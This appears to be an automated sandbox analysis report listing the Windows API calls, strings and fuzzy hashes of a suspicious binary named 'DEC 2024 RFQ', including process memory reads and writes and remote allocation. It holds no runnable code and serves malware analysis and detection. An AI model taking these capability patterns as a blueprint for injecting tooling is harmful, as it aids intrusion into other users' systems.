                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                      • API String ID: 1943609520-557222456
                                                                                                                      • Opcode ID: 833670d3a9d9be271b8b3dc5289e9c199b08943e5fe7f751fd46eecff8008a0d
                                                                                                                      • Instruction ID: 534ac0a3985aca2c8a7f46b334c04a7b657788dd2b301b2875e84984a38e5b2a
                                                                                                                      • Opcode Fuzzy Hash: 833670d3a9d9be271b8b3dc5289e9c199b08943e5fe7f751fd46eecff8008a0d
                                                                                                                      • Instruction Fuzzy Hash: F09179711083119FC715EF24D886CAEB7E9EF85710F00492DF9969B2A2EB30ED84CB56
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00024750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00024743,?,?,000237AE,?), ref: 00024770
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0008B9BB
                                                                                                                      • CoCreateInstance.OLE32(000B2D6C,00000000,00000001,000B2BDC,?), ref: 0008B9D4
                                                                                                                      • CoUninitialize.OLE32 ref: 0008B9F1
                                                                                                                        • Part of subcall function 00029837: __itow.LIBCMT ref: 00029862
                                                                                                                        • Part of subcall function 00029837: __swprintf.LIBCMT ref: 000298AC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 2126378814-24824748
                                                                                                                      • Opcode ID: 5a513d16657d5ae84485b9fc41d4185e1f3577c72a1111fac0638b876e657bc9
                                                                                                                      • Instruction ID: e4b019107d3b7f22ff53df8212fe23b4a000df0fb6d97d9e25f03c41f8a1b26f
                                                                                                                      • Opcode Fuzzy Hash: 5a513d16657d5ae84485b9fc41d4185e1f3577c72a1111fac0638b876e657bc9
                                                                                                                      • Instruction Fuzzy Hash: 47A178756043119FCB14EF14C884DAABBE5FF89324F148998F8999B3A2CB31EC45CB91
                                                                                                                      APIs
                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 000450AD
                                                                                                                        • Part of subcall function 000500F0: __87except.LIBCMT ref: 0005012B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorHandling__87except__start
                                                                                                                      • String ID: pow
                                                                                                                      • API String ID: 2905807303-2276729525
                                                                                                                      • Opcode ID: 5f88179c0cdd82df9134e6864fa8ea1b22acc4250afb8d98704167e48375903f
                                                                                                                      • Instruction ID: 680055cfa88275d0d13a8b8c3d608144dffc9039566cff7e22b2aabde69f572d
                                                                                                                      • Opcode Fuzzy Hash: 5f88179c0cdd82df9134e6864fa8ea1b22acc4250afb8d98704167e48375903f
                                                                                                                      • Instruction Fuzzy Hash: 38513CA5908A0197DB617714CD153AF2FD49B40703F208D6DECD5862ABDE388DDC9A8E
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _memset$_memmove
• String ID: ERCP
• API String ID: 2532777613-1384759551
• Opcode ID: 77c6926fbdbbed4e2ca3fadb0dd6c31b5d881dd8b03fe9ecf5bec60dbef1a1cb
• Instruction ID: e2e18a7a4764759e5ec7b7533e4e22e6b26d3dfa48cfd9a2561b700786b4b446
• Opcode Fuzzy Hash: 77c6926fbdbbed4e2ca3fadb0dd6c31b5d881dd8b03fe9ecf5bec60dbef1a1cb
• Instruction Fuzzy Hash: 5E51C170900705EBDB25CF65C841BABB7F8EF04304F21856EE54ADB281E775EA40CB50
APIs
  • Part of subcall function 000814BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00079296,?,?,00000034,00000800,?,00000034), ref: 000814E6
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0007983F
  • Part of subcall function 00081487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000792C5,?,?,00000800,?,00001073,00000000,?,?), ref: 000814B1
  • Part of subcall function 000813DE: GetWindowThreadProcessId.USER32(?,?), ref: 00081409
  • Part of subcall function 000813DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0007925A,00000034,?,?,00001004,00000000,00000000), ref: 00081419
  • Part of subcall function 000813DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0007925A,00000034,?,?,00001004,00000000,00000000), ref: 0008142F
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000798AC
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000798F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: 52cdc87210843d22ecc8178fcdc0e2026f3720cb752cd187993d1ffbb28f1283
• Instruction ID: 99897aa9a665b7714bf6bd53d6a6b938d401347ba1988959220a077dac9b81c1
• Opcode Fuzzy Hash: 52cdc87210843d22ecc8178fcdc0e2026f3720cb752cd187993d1ffbb28f1283
• Instruction Fuzzy Hash: 41413E76D00218BFDB10EFA4CC81ADEBBB8EF09300F144199FA55B7191DA756E45CBA1
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,000AF910,00000000,?,?,?,?), ref: 000A79DF
• GetWindowLongW.USER32 ref: 000A79FC
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 000A7A0C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: c8063f8342d1266f6be4e7e15f34b6f77f2ab0218ba1cd6ee23f082ec412fb68
• Instruction ID: cf397dd3e9ac284069795e0dfeb444e6dfa8e4e9cec64aaab5514e33838b1cd6
• Opcode Fuzzy Hash: c8063f8342d1266f6be4e7e15f34b6f77f2ab0218ba1cd6ee23f082ec412fb68
• Instruction Fuzzy Hash: 2131E131204606AFDB518EB8DC41BEB77A9EB4A324F248725F979A32E1D730ED508B50
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 000A7461
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 000A7475
• SendMessageW.USER32(?,00001002,00000000,?), ref: 000A7499
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
• Opcode ID: c655d411011abf13db833f94be8ee263fa577dae3f5bf28b3caca0b49690c130
• Instruction ID: 7a1d7323fa78c62c4e404cf53f18776ac85d0be09cccde482162cc56d834de00
• Opcode Fuzzy Hash: c655d411011abf13db833f94be8ee263fa577dae3f5bf28b3caca0b49690c130
• Instruction Fuzzy Hash: AC21BF32500219ABDF218EA4CC42FEA3BA9EB4D724F114214FE596B190DB75AC518BA0
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 000A7C4A
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 000A7C58
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 000A7C5F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
• Opcode ID: 8c165ab0bcdcd31916e53386ee71d46a1d1174b4cb078a861eea9c8af036b0f0
• Instruction ID: eb39a05999c812676b2785712a75925efe29831231af9ec722945b302dc5d9b1
• Opcode Fuzzy Hash: 8c165ab0bcdcd31916e53386ee71d46a1d1174b4cb078a861eea9c8af036b0f0
• Instruction Fuzzy Hash: F2218EB5604609AFEB10DF64DCC1DB737EDEF5A3A4B144459FA05AB3A1CB31EC118AA0
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 000A6D3B
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 000A6D4B
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 000A6D70
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: f25f688a21bf92b0e99a815c21040bc9de0f1cbed9b085f5a321d05bc4e8235d
• Instruction ID: 2f5711fac244a95c802878e24f4012a7a6b03c38053014dd9da54637fd882ed6
• Opcode Fuzzy Hash: f25f688a21bf92b0e99a815c21040bc9de0f1cbed9b085f5a321d05bc4e8235d
• Instruction Fuzzy Hash: 0721A732610118BFEF518F94DC45FFB37BAEF8A760F058124FA455B190C6729C5187A0
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 000A7772
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 000A7787
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 000A7794
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: f485bb0ef380f0fd82a0953a514b83211046ed2a853cfff88afe9c00dbe1f5ff
• Instruction ID: de08009fcfb294d0fd8da64bf27479ddee241c30a559c1ef251bd0de48439075
• Opcode Fuzzy Hash: f485bb0ef380f0fd82a0953a514b83211046ed2a853cfff88afe9c00dbe1f5ff
• Instruction Fuzzy Hash: 72112732204208BAEF205FB0CC01FEB37A9EF89B54F014118F645A6090C271E811CB20
APIs
• __lock.LIBCMT ref: 00049B94
  • Part of subcall function 00049C0B: __mtinitlocknum.LIBCMT ref: 00049C1D
  • Part of subcall function 00049C0B: EnterCriticalSection.KERNEL32(00000000,?,00049A7C,0000000D), ref: 00049C36
• __updatetlocinfoEx_nolock.LIBCMT ref: 00049BA4
  • Part of subcall function 00049100: ___addlocaleref.LIBCMT ref: 0004911C
  • Part of subcall function 00049100: ___removelocaleref.LIBCMT ref: 00049127
  • Part of subcall function 00049100: ___freetlocinfo.LIBCMT ref: 0004913B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
• String ID: 8$8
• API String ID: 547918592-3868594399
• Opcode ID: 21337323f2b6227e04aad554345abf8659660027f6099c2b4b5403b9f68365fd
• Instruction ID: 41f3a73d89779f6a590d4cd1d97b133d72dd6cee4c7bddc9d6b9be43950f8a14
• Opcode Fuzzy Hash: 21337323f2b6227e04aad554345abf8659660027f6099c2b4b5403b9f68365fd
• Instruction Fuzzy Hash: ABE08CB1943700EAEA50BBE4AA03B8F27909B01B31F20417BF0555D1C3CF782840867F
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00024BD0,?,00024DEF,?,000E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00024C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00024C23
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                      • API String ID: 2574300362-3689287502
                                                                                                                      • Opcode ID: 603b09ace05d972a0106334110a376802aa530c67a144808a24969c293826a22
                                                                                                                      • Instruction ID: 5fe71aee2c3b61c1aa2f351ca1e67734d4f87d6ca2768c3d594f04517f9694f8
                                                                                                                      • Opcode Fuzzy Hash: 603b09ace05d972a0106334110a376802aa530c67a144808a24969c293826a22
                                                                                                                      • Instruction Fuzzy Hash: 90D01230511B23CFD760AFB5ED58656B6E5EF0A352B118C3AD885D6150E7F4D480C660
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00024B83,?), ref: 00024C44
                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00024C56
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                      • API String ID: 2574300362-1355242751
                                                                                                                      • Opcode ID: 70a93d84cc1adb3a202c1b0d7f572fead469235343f9806b1d1085c32c6d9389
                                                                                                                      • Instruction ID: 6f9f834411f47d27f006ce0c6da4009fce052e41a83eab29f6a3ffbe02adc1d7
                                                                                                                      • Opcode Fuzzy Hash: 70a93d84cc1adb3a202c1b0d7f572fead469235343f9806b1d1085c32c6d9389
                                                                                                                      • Instruction Fuzzy Hash: 04D0C230510B23CFD7205FB5E81821672E4AF02341B20883AD592DA160E774D480C620
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,000A1039), ref: 000A0DF5
                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000A0E07
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                      • API String ID: 2574300362-4033151799
                                                                                                                      • Opcode ID: 5bf2f914589e3ccdcc4f28f3190507d4292cda49776fcc45fb3071d8c71746bd
                                                                                                                      • Instruction ID: d934f45daa1099a9b724697855d36ff0232de100da37b923056a84948c503146
                                                                                                                      • Opcode Fuzzy Hash: 5bf2f914589e3ccdcc4f28f3190507d4292cda49776fcc45fb3071d8c71746bd
                                                                                                                      • Instruction Fuzzy Hash: 71D0C730440B27CFE3209FB0D80828272E4AF12382F008C3ED582C6250E6B4E890CB20
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00098CF4,?,000AF910), ref: 000990EE
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00099100
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                      • API String ID: 2574300362-199464113
                                                                                                                      • Opcode ID: 1822099d25f06fcf58e5da8799e50afb122a279f982246b57c849465a72f815f
                                                                                                                      • Instruction ID: 3b00e0390c0135b9bd591c6725c38b2dea0b911e31d3c5e30a30a8f9ef5ddb63
                                                                                                                      • Opcode Fuzzy Hash: 1822099d25f06fcf58e5da8799e50afb122a279f982246b57c849465a72f815f
                                                                                                                      • Instruction Fuzzy Hash: 9CD01234510713CFDB209FB5D85855676E4AF06352B15CC3ED585D6550E774C4C0C760
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LocalTime__swprintf
                                                                                                                      • String ID: %.3d$WIN_XPe
                                                                                                                      • API String ID: 2070861257-2409531811
                                                                                                                      • Opcode ID: 69db49983c1f9566d45208a1ad7897abcb41616be0cb7fe1f47cfa5467e61366
                                                                                                                      • Instruction ID: 30c76bb0e23576f253866420418c5c374492fd0d228a4b09785d457eb4f52432
                                                                                                                      • Opcode Fuzzy Hash: 69db49983c1f9566d45208a1ad7897abcb41616be0cb7fe1f47cfa5467e61366
                                                                                                                      • Instruction Fuzzy Hash: 88D05EB180C219FACB209B90DC8CDFD73BDAB09301F180462F506E2080E2369B94EB21
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ecdc87acb957ea282ef389e238c6f67a10bddce6e45b2b36f382fc3a606c75b4
                                                                                                                      • Instruction ID: fd57b71fffd42bec9d684612ec62d63845b4aa115fcacf13a58d6690523d1828
                                                                                                                      • Opcode Fuzzy Hash: ecdc87acb957ea282ef389e238c6f67a10bddce6e45b2b36f382fc3a606c75b4
                                                                                                                      • Instruction Fuzzy Hash: F3C14974E04216EFCB14CFA4C884AAEBBB5FF48744B148598E80DEB251D734EE81DB94
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0009E0BE
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0009E101
                                                                                                                        • Part of subcall function 0009D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0009D7C5
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0009E301
                                                                                                                      • _memmove.LIBCMT ref: 0009E314
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
